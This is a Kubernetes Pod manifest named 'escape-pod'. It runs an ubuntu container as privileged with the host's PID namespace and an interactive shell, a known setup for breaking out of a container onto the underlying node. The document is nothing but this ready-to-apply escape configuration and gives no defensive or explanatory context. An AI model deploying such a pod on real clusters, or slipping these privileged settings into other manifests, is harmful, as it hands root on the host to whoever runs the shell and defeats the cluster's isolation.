apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
spec:
  hostPID: true
  containers:
  - name: escape-container
    image: ubuntu
    securityContext:
      privileged: true
    command: ["/bin/sh"]
    stdin: true
    tty: true
